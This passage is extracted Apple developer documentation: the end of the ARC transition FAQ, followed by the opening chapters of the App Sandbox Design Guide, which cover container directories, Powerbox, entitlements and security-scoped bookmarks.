You should avoid memcpy or realloc. Is ARC slow? It depends on what you’re measuring, but generally “no.” The compiler efficiently eliminates many extraneous retain/release calls and much effort has been invested in speeding up the Objective-C runtime in general. In particular, the common “return a retain/autoreleased object” pattern is much faster and does not actually put the object into the autorelease pool, when the caller of the method is ARC code. One issue to be aware of is that the optimizer is not run in common debug configurations, so expect to see a lot more retain/release traffic at -O0 than at -Os. Does ARC work in ObjC++ mode? Yes. You can even put strong/weak ids in classes and containers. The ARC compiler synthesizes retain/release logic in copy constructors and destructors etc to make this work. Which classes don’t support weak references? Transitioning to ARC Release Notes Frequently Asked Questions 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 20You cannot currently create weak references to instances of the following classes: NSATSTypesetter, NSColorSpace, NSFont, NSMenuView, NSParagraphStyle, NSSimpleHorizontalTypesetter, and NSTextView. Note: In addition, in OS X v10.7, you cannot create weak referencesto instances of NSFontManager, NSFontPanel, NSImage, NSTableCellView, NSViewController, NSWindow, and NSWindowController. In addition, in OS X v10.7 no classes in the AV Foundation framework support weak references. For declared properties, you should use assign instead of weak; for variables you should use __unsafe_unretained instead of __weak. In addition, you cannot create weak references from instances of NSHashTable, NSMapTable, or NSPointerArray under ARC. What do I have to do when subclassing NSCell or another class that uses NSCopyObject? Nothing special. ARC takes care of cases where you had to previously add extra retains explicitly. With ARC, all copy methods should just copy over the instance variables. Can I opt out of ARC for specific files? Yes. Transitioning to ARC Release Notes Frequently Asked Questions 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 21When you migrate a project to use ARC, the -fobjc-arc compiler flag is set as the default for all Objective-C source files. You can disable ARC for a specific class using the -fno-objc-arc compiler flag for that class. In Xcode, in the target Build Phasestab, open the Compile Sources group to reveal the source file list. Double-click the file for which you want to set the flag, enter -fno-objc-arc in the pop-up panel, then click Done. Is GC (Garbage Collection) deprecated on the Mac? Garbage collection is deprecated in OS X Mountain Lion v10.8, and will be removed in a future version of OS X. Automatic Reference Counting is the recommended replacement technology. To aid in migrating existing applications, the ARC migration tool in Xcode 4.3 and later supports migration of garbage collected OS X applications to ARC. Note: For apps targeting the Mac App Store, Apple strongly recommends you replace garbage collection with ARC as soon as feasible, because Mac App Store guidelines (see App Store Review Guidelines for Mac Apps) prohibit the use of deprecated technologies. Transitioning to ARC Release Notes Frequently Asked Questions 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 22This table describes the changes to Transitioning to ARC Release Notes. Date Notes 2012-07-17 Updated for OS X v10.8. 2012-03-14 Noted that under ARC properties are strong by default. 2012-02-16 Corrected out-of-date advice regarding C++ integration. 2012-01-09 Added note to search for weak references. First version of a document that describes how to transition code from manual retain/release to use ARC. 2011-10-12 2012-07-17 | © 2012 Apple Inc. All Rights Reserved. 23 Document Revision HistoryApple Inc. © 2012 Apple Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrievalsystem, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice. No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers. Apple Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, Cocoa, Leopard, Mac, Objective-C, OS X, Snow Leopard, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries. App Store and Mac App Store are service marks of Apple Inc. iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license. Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE.ASARESULT, THISDOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY. IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL,OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages. THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty. Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state. App Sandbox Design GuideContents About App Sandbox 5 At a Glance 5 How to Use This Document 6 Prerequisites 6 See Also 6 App Sandbox Quick Start 8 Create the Xcode Project 8 Enable App Sandbox 10 Create a Code Signing Certificate for Testing 10 Specify the Code Signing Identity 11 Confirm That the App Is Sandboxed 12 Resolve an App Sandbox Violation 13 App Sandbox in Depth 15 The Need for a Last Line of Defense 15 Container Directories and File System Access 16 The App Sandbox Container Directory 16 The Application Group Container Directory 17 Powerbox and File System Access Outside of Your Container 17 Open and Save Dialog Behavior with App Sandbox 19 Entitlements and System Resource Access 20 Security-Scoped Bookmarks and Persistent Resource Access 21 Two Distinct Types of Security-Scoped Bookmark 21 Using Security-Scoped Bookmarks 22 App Sandbox and Code Signing 24 External Tools, XPC Services, and Privilege Separation 26 Designing for App Sandbox 27 Six Steps for Adopting App Sandbox 27 Determine Whether Your App Is Suitable for Sandboxing 27 Design a Development and Distribution Strategy 29 Resolve API Incompatibilities 29 Opening, Saving, and Tracking Documents 29 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 2Retaining Access to File System Resources 29 Creating a Login Item for Your App 30 Accessing User Data 30 Accessing Preferences of Other Apps 30 Apply the App Sandbox Entitlements You Need 31 Add Privilege Separation Using XPC 32 Implement a Migration Strategy 32 Migrating an App to a Sandbox 33 Creating a Container Migration Manifest 34 Undoing a Migration for Testing 36 An Example Container Migration Manifest 36 Use Variables to Specify Support-File Directories 37 Document Revision History 39 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 3 ContentsTables and Listings App Sandbox in Depth 15 Table 2-1 The App Sandbox mindset 15 Table 2-2 Open and Save class inheritance with App Sandbox 20 Migrating an App to a Sandbox 33 Table 4-1 How system directory variables resolve depending on context 37 Table 4-2 Variables for support-file directories 38 Listing 4-1 An example container migration manifest 36 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 4App Sandbox provides a last line of defense against stolen, corrupted, or deleted user data if malicious code exploits your app. App Sandbox also minimizes the damage from coding errors in your app or in frameworks you link against. Your app All system resources All user data Unrestricted access Other system resources Other user data Your app Unrestricted access No access Without App Sandbox With App Sandbox Your sandbox App Sandbox is an access control technology provided in OS X, enforced at the kernel level. Its strategy is twofold: 1. App Sandbox enables you to describe how your app interacts with the system. The system then grants your app the access it needs to get its job done, and no more. 2. App Sandbox allows the user to transparently grant your app additional access by way of Open and Save dialogs, drag and drop, and other familiar user interactions. At a Glance Based on simple security principles, App Sandbox provides strong defense against damage from malicious code. The elements of App Sandbox are container directories, entitlements, user-determined permissions, privilege separation, and kernel enforcement. It’s up to you to understand these elements and then to use your understanding to create a plan for adopting App Sandbox. 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 5 About App SandboxRelevant chapters: “App Sandbox Quick Start” (page 8), “App Sandbox in Depth” (page 15) After you understand the basics, look at your app in light of this security technology. First, determine if your app issuitable forsandboxing. Most apps are. Design your developmentstrategy, resolve API incompatibilities, determine which entitlements you need, and consider applying privilege separation to maximize the defensive value of App Sandbox. Relevant chapter: “Designing for App Sandbox” (page 27) Some file system locations that your app uses are different when you adopt App Sandbox. In particular, you gain a container directory to be used for app support files, databases, caches, and other files apart from user documents. OS X and Xcode support migration of files from their legacy locations to your container. Relevant chapter: “Migrating an App to a Sandbox” (page 33) How to Use This Document To get up and running with App Sandbox, perform the tutorial in “App Sandbox Quick Start” (page 8). Before sandboxing an app you intend to distribute, be sure you understand “App Sandbox in Depth” (page 15). When you’re ready to startsandboxing a new app, or to convert an existing app to adopt App Sandbox, read “Designing for App Sandbox” (page 27). If you’re providing a new, sandboxed version of your app to users already running a version that is not sandboxed, read “Migrating an App to a Sandbox” (page 33). Prerequisites Before you read this document, make sure you understand the place of App Sandbox and code signing in the overall OS X development process by reading Mac App Programming Guide . See Also To complement the damage containment provided by App Sandbox, you must provide a first line of defense by adopting secure coding practices throughout your app. To learn how, read Security Overview and Secure Coding Guide . About App Sandbox How to Use This Document 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 6An important step in adopting App Sandbox is requesting entitlements for your app. For details on all the available entitlements, see Entitlement Key Reference . You can enhance the benefits of App Sandbox in a full-featured app by implementing privilege separation. You do this using XPC, an OS X implementation of interprocess communication. To learn the details of using XPC, read Daemons and Services Programming Guide . About App Sandbox See Also 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 7In this Quick Start you get an OS X app up and running in a sandbox. You verify that the app isindeed sandboxed and then learn how to troubleshoot and resolve a typical App Sandbox error. The apps you use are Xcode, Keychain Access, Activity Monitor, and Console. Create the Xcode Project The app you create in this Quick Start uses a WebKit web view and consequently uses a network connection. Under App Sandbox, network connections don’t work unless you specifically allow them—making this a good example app for learning about sandboxing. To create the Xcode project for this Quick Start 1. In Xcode 4, create a new Xcode project for an OS X Cocoa application. ● Name the project AppSandboxQuickStart. ● Set a company identifier, such as com.yourcompany, if none is already set. ● Ensure that Use Automatic Reference Counting is selected and that the other checkboxes are unselected. 2. In the project navigator, click the MainMenu nib file. The Interface Builder canvas appears. 3. In the Xcode dock, click the Window object. The app’s window is now visible on the canvas. 4. In the object library (in the utilities area), locate the WebView object. 5. Drag a web view onto the window on the canvas. 6. (Optional) To improve the display of the web view in the running app, perform the following steps: ● Drag the sizing controls on the web view so that it completely fills the window’s main view. ● Using the size inspector for the web view, ensure that all of the inner and outer autosizing contraints are active. 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 8 App Sandbox Quick Start7. Create and connect an outlet for the web view in the AppDelegate class. In Xcode, use the following specification: Outlet connection source The WebView object of the MainMenu nib file. Outlet variable location The interface block of the AppDelegate.h header file. Outlet name webView Storage weak At this point, if you were to build the app, Xcode would report an error because the project doesn’t yet use WebKit but does have a web view in the nib file. You take care of this in the next step. 8. Add the WebKit framework to the app. ● Import the WebKit framework by adding the following statement above the interface block in the AppDelegate.h header file: #import ● Link the WebKit framework to the Quick Start project as a required framework. 9. Add the following awakeFromNib method to the AppDelegate.m implementation file: - (void) awakeFromNib { [self.webView.mainFrame loadRequest: [NSURLRequest requestWithURL: [NSURL URLWithString: @"http://www.apple.com"]]]; } On application launch, this method requeststhe specified URL from the computer’s network connection and then sends the result to the web view for display. Now, build and run the app—which is not yet sandboxed and so has free access to system resources including its network sockets. Confirm that the app’s window displays the page you specified in the awakeFromNib method. When done, quit the app. App Sandbox Quick Start Create the Xcode Project 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 9Enable App Sandbox You enable App Sandbox by selecting a checkbox in the Xcode target editor. In Xcode, click the project file in the project navigator and click the AppSandboxQuickStart target, if they’re not already selected. View the Summary tab of the target editor. To enable App Sandbox for the project 1. In the Summary tab of the target editor, click Enable Entitlements. An entitlement is a key-value pair, defined in a property list file, that confers a specific capability or security permission to a target. When you click Enable Entitlements, Xcode automatically checks the Code Sign Application checkbox and the Enable App Sandboxing checkbox. Together, these are the essential projectsettingsfor enabling App Sandbox. When you click Enable Entitlements, Xcode also creates a .entitlements property list file, visible in the project navigator. As you use the graphical entitlementsinterface in the target editor, Xcode updates the property list file. 2. Clear the contents of the iCloud entitlement fields. This Quick Start doesn’t use iCloud. Because Xcode automatically adds iCloud entitlement values when you enable entitlements, delete them as follows: ● In the Summary tab of the target editor,select and then delete the content of the iCloud Key-Value Store field. ● Click the top row in the iCloud Containers field and click the minus button. At this point in the Quick Start, you have enabled App Sandbox but have not yet provided a code signing identity for the Xcode project. Consequently, if you attempt to build the project now, the build fails. You take care of this in the next two sections. Create a Code Signing Certificate for Testing To build a sandboxed app in Xcode, you must have a code signing certificate and its associated private key in your keychain, and then use that certificate’s code signing identity in the project. The entitlements you specify, including the entitlement that enables App Sandbox, become part of the app’s code signature when you build the project. App Sandbox Quick Start Enable App Sandbox 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 10In this section, you create a code signing certificate. This simplified process lets you stay focused on the steps for enabling a sandbox. Important: A code signing certificate that you create as described in this Quick Start is not appropriate to use with an app you intend to distribute. Before you work on sandboxing an app you plan to distribute, read “App Sandbox and Code Signing” (page 24). To create a code signing certificate for testing App Sandbox 1. In Keychain Access (available in Applications/Utilities), choose KeyChain Access > Certificate Assistant > Create a Certificate. Certificate Assistant opens. Note: Before you invoke the “Create a Certificate” menu command, ensure that no key is selected in the Keychain Access main window. If a key is selected, the menu command is not available. 2. In Certificate Assistant, name the certificate something like My Test Certificate. 3. Complete the configuration of the certificate as follows: Identity type Self Signed Root Certificate type Code Signing Let me override defaults unchecked 4. Click Create. 5. In the alert that appears, click Continue. 6. In the Conclusion window, click Done. Your new code signing certificate, and its associated public and private keys, are now available in Keychain Access. Specify the Code Signing Identity Now, configure the Xcode project to use the code signing identity from the certificate you created in the previous task. App Sandbox Quick Start Specify the Code Signing Identity 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 11To specify the code signing identity for the project 1. View the Build Settings tab in the project editor. Take care that you are using the project editor, not the target editor. 2. In the Code Signing section, locate the Code Signing Identity row. 3. Click the value area of the Code Signing Identity row. 4. In the popup menu that opens, choose Other. 5. In the text entry window that opens, enter the exact name of the newly created code signing certificate, then press . If you’re using the suggested name from thisQuick Start, the name you enter is My Test Certificate. Now, build the app. The codesign tool may display an alert asking for permission to use the new certificate. If you do see this alert, click Always Allow. Confirm That the App Is Sandboxed Build and run the Quick Start app. The window opens, but if the app issuccessfully sandboxed, no web content appears. This is because you have not yet conferred permission to access a network connection. Apart from blocked behavior, there are two specific signs that an OS X app is successfully sandboxed. To confirm that the Quick Start app is successfully sandboxed 1. In Finder, look at the contents of the ~/Library/Containers/ folder. If the Quick Start app is sandboxed, there is now a container folder named after your app. The name includes the company identifier for the project, so the complete folder name would be, for example, com.yourcompany.AppSandboxQuickStart. The system creates an app’s container folder, for a given user, the first time the user runs the app. 2. In Activity Monitor, check that the system recognizes the app as sandboxed. ● Launch Activity Monitor (available in /Applications/Utilities). ● In Activity Monitor, choose View > Columns. Ensure that the Sandbox menu item is checked. ● In the Sandbox column, confirm that the value for the Quick Start app is Yes. App Sandbox Quick Start Confirm That the App Is Sandboxed 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 12To make it easier to locate the app in Activity monitor, enter the name of the Quick Start app in the Filter field. Tip: If the app crashes when you attempt to run it,specifically by receiving an EXC_BAD_INSTRUCTION signal, the most likely reason is that you previously ran a sandboxed app with the same bundle identifier but a different code signature. This crashing upon launch is an App Sandbox security feature that prevents one app from masquerading as another and thereby gaining access to the other app’s container. You learn how to design and build your apps, in light of this security feature, in “App Sandbox and Code Signing” (page 24). Resolve an App Sandbox Violation An App Sandbox violation occurs if your app tries to do something that App Sandbox does not allow. For example, you have already seen in this Quick Start that the sandboxed app is unable to retrieve content from the web. Fine-grained restriction over access to system resources is the heart of how App Sandbox provides protection should an app become compromised by malicious code. The most common source of App Sandbox violations is a mismatch between the entitlement settings you specified in Xcode and the needs of your app. In this section you observe and then correct an App Sandbox violation. To diagnose an App Sandbox violation 1. Build and run the Quick Start app. The app starts normally, but fails to display the webpage specified in its awakeFromNib method (as you’ve previously observed in “Confirm That the App Is Sandboxed” (page 12)). Because displaying the webpage worked correctly before you sandboxed the app, it is appropriate in this case to suspect an App Sandbox violation. 2. Open Console (available in /Applications/Utilities/) and ensure that All Messages is selected in the sidebar. In the filter field of the Console window, enter sandboxd to display only App Sandbox violations. sandboxd is the name of the App Sandbox daemon that reports on sandbox violations. The relevant messages, as displayed in Console, look similar to the following: 3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny network-outbound 111.30.222.15:80 3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny system-socket App Sandbox Quick Start Resolve an App Sandbox Violation 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 13The problem that generates these console messages is that the Quick Start app does not yet have the entitlement for outbound network access. Tip: To see the full backtraces for either violation, click the paperclip icon near the right edge of the corresponding Console message. The steps in the previous task illustrate the general pattern to use for identifying App Sandbox violations: 1. Confirm that the violation occurs only with App Sandbox enabled in your project. 2. Provoke the violation (such as by attempting to use a network connection, if your app is designed to do that). 3. Look in Console for sandboxd messages. There is also a simple, general pattern to use for resolving such violations. To resolve the App Sandbox violation by adding the appropriate entitlement 1. Quit the Quick Start app. 2. In the Summary tab of the target editor, look for the entitlement that corresponds to the reported sandboxd violation. In this case, the primary error is deny network-outbound. The corresponding entitlement is Allow Outgoing Network Connections. 3. In the Summary tab of the target editor, select the Allow Outgoing Network Connections checkbox. Doing so applies a TRUE value, for the needed entitlement, to the Xcode project. 4. Build and run the app. The intended webpage now displays in the app. In addition, there are no new App Sandbox violation messages in Console. App Sandbox Quick Start Resolve an App Sandbox Violation 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 14The access control mechanisms used by App Sandbox to protect user data are small in number and easy to understand. But the specific steps for you to take, as you adopt App Sandbox, are unique to your app. To determine what those steps are, you must understand the key concepts for this technology. The Need for a Last Line of Defense You secure your app against attack from malware by following the practices recommended in Secure Coding Guide . But despite your best efforts to build an invulnerable barrier—by avoiding buffer overflows and other memory corruptions, preventing exposure of user data, and eliminating other vulnerabilities—your app can be exploited by malicious code. An attacker needs only to find a single hole in your defenses, or in any of the frameworks and libraries that you link against, to gain control of your app’s interactions with the system. App Sandbox is designed to confront this scenario head on by letting you describe your app’s intended interactions with the system. The system then grants your app only the access your app needs to get its job done. If malicious code gains control of a properly sandboxed app, it is left with access to only the files and resources in the app’s sandbox. To successfully adopt App Sandbox, use a different mindset than you might be accustomed to, as suggested in Table 2-1. Table 2-1 The App Sandbox mindset When developing… When adopting App Sandbox… Add features Minimize system resource use Take advantage of access throughout your app Partition functionality, then distrust each part Use the most convenient API Use the most secure API View restrictions as limitations View restrictions as safeguards 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 15 App Sandbox in DepthWhen designing for App Sandbox, you are planning for the following worst-case scenario: Despite your best efforts, malicious code breaches an unintended security hole—either in your code or in a framework you’ve linked against. Capabilities you’ve added to your app become capabilities of the hostile code. Keep this in mind as you read the rest of this document. Container Directories and File System Access When you adopt App Sandbox, the system provides a special directory for use by your app—and only by your app—called a container. Each user on a system gets an individual container for your app, within their home directory; your app has unfettered read/write access to the container for the current user. The App Sandbox Container Directory The container has the following characteristics: ● It is located at a system-defined path, within the user’s home directory, that you can obtain by calling the NSHomeDirectory function. ● Your app has unrestricted read/write access to the container and its subdirectories. ● OS X path-finding APIs (above the POSIX layer) refer to locations that are specific to your app. Most of these path-finding APIsrefer to locationsrelative to your app’s container. For example, the container includes an individual Library directory (specified by the NSLibraryDirectory search path constant) for use only by your app, with individual Application Support and Preferences subdirectories. Using your container forsupport filesrequires no code change (from the pre-sandbox version of your app) but may require one-time migration, as explained in “Migrating an App to a Sandbox” (page 33). Some path-finding APIs (above the POSIX layer) refer to app-specific locations outside of the user’s home directory. In a sandboxed app, for example, the NSTemporaryDirectory function provides a path to a directory that is outside of the user’s home directory but specific to your app and within your sandbox; you have unrestricted read/write access to it for the current user. The behavior of these path-finding APIs is suitably adjusted for App Sandbox and no code change is needed. ● OS X establishes and enforces the connection between your app and its container by way of your app’s code signature. ● The container isin a hidden location, and so users do not interact with it directly. Specifically, the container is not for user documents. It is for files that your app uses, along with databases, caches, and other app-specific data. For a shoebox-style app, in which you provide the only user interface to the user’s content, that content goes in the container and your app has full access to it. App Sandbox in Depth Container Directories and File System Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 16iOS Note: Because it is not for user documents, an OS X container differs from an iOS container—which, in iOS, is the one and only location for user documents. In addition, an iOS container contains the app itself. This is not so in OS X. iCloud Note: Apple’s iCloud technology, as described in “iCloud Storage”, uses the name “container” as well. There is no functional connection between an iCloud container and an App Sandbox container. Thanks to code signing, no other sandboxed app can gain access to your container, even if it attempts to masquerade as your app by using your bundle identifier. Future versions of your app, however—provided that you use the same code signature and bundle identifier—do reuse your app’s container. The time at which a container directory is created for an App Sandbox–enabled app is when the app is first run. Because a container is within a user’s home folder, each user on a system gets their own container for your app. A given user’s container is created when that user first runs your app. The Application Group Container Directory In addition to per-app containers, beginning in OS X v10.7.4, an application can use entitlements to request access to a shared container that is common to multiple applications produced by the same development team. This container is intended for content that is not user-facing, such as shared caches or databases. Applicationsthat are members of an application group also gain the ability to share Mach and POSIX semaphores and to use certain other IPC mechanisms in conjunction with other group members. These group containers are automatically created or added into each app’s sandbox container as determined by the existence of these keys, and are stored in ~/Library/Group Containers/, where can be whatever name you choose. Your app can obtain the path to the group containers by calling the containerURLForSecurityApplicationGroupIdentifier: method of NSURL. For more details, see “Adding an Application to an Application Group” in Entitlement Key Reference . Powerbox and File System Access Outside of Your Container Your sandboxed app can access file system locations outside of its container in the following three ways: ● At the specific direction of the user App Sandbox in Depth Container Directories and File System Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 17● By using entitlements for specific file-system locations (described in “Entitlements and System Resource Access” (page 20)) ● When the file system location is in certain directories that are world readable The OS X security technology that interacts with the user to expand yoursandbox is called Powerbox. Powerbox has no API. Your app uses Powerbox transparently when you use the NSOpenPanel and NSSavePanel classes. You enable Powerbox by setting an entitlement using Xcode, as described in “Enabling User-Selected File Access” in Entitlement Key Reference . When you invoke an Open or Save dialog from your sandboxed app, the window that appears is presented not by AppKit but by Powerbox. Using Powerbox is automatic when you adopt App Sandbox—it requires no code change from the pre-sandbox version of your app. Accessory panelsthat you’ve implemented for opening or saving are faithfully rendered and used. Note: When you adopt App Sandbox, there are some important behavioral differences for the NSOpenPanel and NSSavePanel classes, described in “Open and Save Dialog Behavior with App Sandbox” (page 19). The security benefit provided by Powerbox is that it cannot be manipulated programmatically—specifically, there is no mechanism for hostile code to use Powerbox for accessing the file system. Only a user, by interacting with Open and Save dialogs via Powerbox, can use those dialogs to reach portions of the file system outside of your previously established sandbox. For example, if a user saves a new document, Powerbox expands your sandbox to give your app read/write access to the document. When a user of your app specifies they want to use a file or a folder, the system adds the associated path to your app’s sandbox. Say, for example, a user drags the ~/Documents folder onto your app’s Dock tile (or onto your app’s Finder icon, or into an open window of your app), thereby indicating they want to use that folder. In response, the system makes the ~/Documents folder, its contents, and its subfolders available to your app. If a user instead opens a specific file, or saves to a new file, the system makes the specified file, and that file alone, available to your app. In addition, the system automatically permits a sandboxed app to: ● Connect to system input methods ● Invoke services chosen by the user from the Services menu (only those services flagged as “safe” by the service provider are available to a sandboxed app) ● Open files chosen by the user from the Open Recent menu ● Participate with other apps by way of user-invoked copy and paste App Sandbox in Depth Container Directories and File System Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 18● Read files that are world readable, in certain directories, including the following directories: ● /bin ● /sbin ● /usr/bin ● /usr/lib ● /usr/sbin ● /usr/share ● /System After a user hasspecified a file they want to use, that file is within your app’ssandbox. The file isthen vulnerable to attack if your app is exploited by malicious code: App Sandbox provides no protection. To provide protection for the files within your sandbox, follow the recommendations in Secure Coding Guide . A critical aspect of following user intent is that throughout OS X, simulation or alteration of user input is not allowed. This has implications for assistive apps, as described in “Determine Whether Your App Is Suitable for Sandboxing” (page 27). By default, files opened or saved by the user remain within your sandbox until your app terminates, except for files that were open at the time that your app terminates. Such files reopen automatically by way of the OS X Resume feature the next time your app launches, and are automatically added back to your app’ssandbox. To provide persistent access to resources located outside of your container, in a way that doesn’t depend on Resume, use security-scoped bookmarks as explained in “Security-Scoped Bookmarks and Persistent Resource Access” (page 21). Open and Save Dialog Behavior with App Sandbox Certain NSOpenPanel and NSSavePanel methods behave differently when App Sandbox is enabled for your app: ● You cannot invoke the OK button using the ok: method. ● You cannot rewrite the user’sselection using the panel:userEnteredFilename:confirmed: method from the NSOpenSavePanelDelegate protocol. In addition, the effective, runtime inheritance path for the NSOpenPanel and NSSavePanel classesis different with App Sandbox, as illustrated in Table 2-2. App Sandbox in Depth Container Directories and File System Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 19Table 2-2 Open and Save class inheritance with App Sandbox Without App Sandbox NSOpenPanel : NSSavePanel : NSPanel : NSWindow : NSResponder : NSObject With App Sandbox NSOpenPanel : NSSavePanel : NSObject Because of this runtime difference, an NSOpenPanel or NSSavePanel object inherits fewer methods with App Sandbox. If you attempt to send a message to an NSOpenPanel or NSSavePanel object, and that method is defined in the NSPanel, NSWindow, or NSResponder classes, the system raises an exception. The Xcode compiler does not issue a warning or error to alert you to this runtime behavior. Entitlements and System Resource Access An app that is notsandboxed has accessto all user-accessible system resources—including the built-in camera and microphone, network sockets, printing, and most of the file system. If successfully attacked by malicious code, such an app can behave as a hostile agent with wide-ranging potential to inflict harm. When you enable App Sandbox for your app, you remove all but a minimalset of privileges and then deliberately restore them, one-by-one, using entitlements. An entitlement is a key-value pair that identifies a specific capability, such as the capability to open an outbound network socket. One special entitlement—Enable App Sandboxing—turns on App Sandbox. When you enable sandboxing, Xcode creates a .entitlements property list file and shows it in the project navigator. If your app requires a capability, request it by adding the corresponding entitlement to your Xcode project using the Summary tab of the target editor. If you don’t require a capability, take care to not include the corresponding entitlement. You request entitlements on a target-by-target basis. If your app has a single target—the main application—you request entitlements only forthat target. If you design your app to use a main application along with helpers (in the form of XPC services), you request entitlements individually, and as appropriate, for each target. You learn more about this in “XPC and Privilege Separation” (page 26). You may require finer-grained control over your app’s entitlements than is available in the Xcode target editor. For example, you might request a temporary exception entitlement because App Sandbox does not support a capability your app needs, such as the ability to send Apple events. To work with temporary exception entitlements, use the Xcode property list editor to edit a target’s .entitlements property list file directly. App Sandbox in Depth Entitlements and System Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 20Note: If you request a temporary exception entitlement, be sure to follow the guidance regarding entitlements provided on the iTunes Connect website. In particular, use the Review Notes field in iTunes Connect to explain why your app needs the temporary exception. OS X App Sandbox entitlements are described in “Enabling App Sandbox” in Entitlement Key Reference . For a walk-through of requesting an entitlement for a target in an Xcode project,see “App Sandbox Quick Start” (page 8). Security-Scoped Bookmarks and Persistent Resource Access Your app’s access to file-system locations outside of its container—as granted to your app by way of user intent, such as through Powerbox—does not automatically persist across app launches or system restarts. When your app reopens, you have to start over. (The one exception to this is for files open at the time that your app terminates, which remain in your sandbox thanks to the OS X Resume feature). Starting in OS X v10.7.3, you can retain access to file-system resources by employing a security mechanism, known as security-scoped bookmarks, that preserves user intent. Here are a few examples of app features that can benefit from this: ● A user-selected download, processing, or output folder ● An image browser library file, which points to user-specified images at arbitrary locations ● A complex document format that supports embedded media stored in other locations Two Distinct Types of Security-Scoped Bookmark Security-scoped bookmarks, available starting in OS X v10.7.3, support two distinct use cases: ● An app-scoped bookmark provides your sandboxed app with persistent access to a user-specified file or folder. For example, if your app employs a download or processing folder that is outside of the app container, obtain initial access by presenting an NSOpenPanel dialog to obtain the user’s intent to use a specific folder. Then, create an app-scoped bookmark for that folder and store it as part of the app’s configuration (perhaps in a property list file or using the NSUserDefaults class). With the app-scoped bookmark, your app can obtain future access to the folder. ● A document-scoped bookmark provides a specific document with persistent access to a file. App Sandbox in Depth Security-Scoped Bookmarks and Persistent Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 21For example, a code editor typically supports the notion of a project document that refers to other files and needs persistent access to those files. Other examples are an image browser or editor that maintains an image library, in which the library file needs persistent accessto the imagesit owns; or a word processor that supports embedded images, multimedia, or font files in its document format. In these cases, you configure the document format (of the project file, library file, word processing document, and so on) to be able to store security-scoped bookmarks to the files a document refers to. Obtain initial access to a referred item by asking for user intent to use that item. Then, create a document-scoped bookmark for the item and store the bookmark as part of the document’s data. A document-scoped bookmark can be resolved by any app that has access to the bookmark data itself and to the document that owns the bookmark. This supports portability, allowing a user, for example, to send a document to another user; the document’s secure bookmarks remain usable for the recipient. The document can be a flat file or a document distributed as a bundle. A document-scoped bookmark can point only to a file, not a folder, and only to a file that is not in a location used by the system (such as /private or /Library). Using Security-Scoped Bookmarks To use either type of security-scoped bookmark requires you to perform five steps: 1. Set the appropriate entitlement in the target that needs to use security-scoped bookmarks. Do this once per target as part of configuring your Xcode project. 2. Create a security-scoped bookmark. Do this when a user has indicated intent (such as via Powerbox) to use a file-system resource outside of your app’s container, and you want to preserve your app’s ability to access the resource. 3. Resolve the security-scoped bookmark. Do this when your app later (for example, after app relaunch) needs access to a resource you bookmarked in step 2. The result of this step is a security-scoped URL. 4. Explicitly indicate that you want to use the file-system resource whose URL you obtained in step 3. Do this immediately after obtaining the security-scoped URL (or, when you later want to regain access to the resource after having relinquished your access to it). 5. When done using the resource, explicitly indicate that you want to stop using it. Do this as soon as you know that you no longer need access to the resource (typically, after you close it). After you relinquish access to a file-system resource, to use that resource again you must return to step 4 (to again indicate you want to use the resource). If your app is relaunched, you must return to step 3 (to resolve the security-scoped bookmark). App Sandbox in Depth Security-Scoped Bookmarks and Persistent Resource Access 2012-09-19 | © 2012 Apple Inc. All Rights Reserved. 22The first step in the preceding list, requesting entitlements, is the prerequisite for using either type of security-scoped bookmark. Perform this step as follows: ● To use app-scoped bookmarksin a target,setthe com.apple.security.files.bookmarks.app-scope entitlement value to true. ● To use document-scoped bookmarks in a target, set the com.apple.security.files.bookmarks.document-scope entitlement value to true. You can request either or both of these entitlements in a target, as needed. These 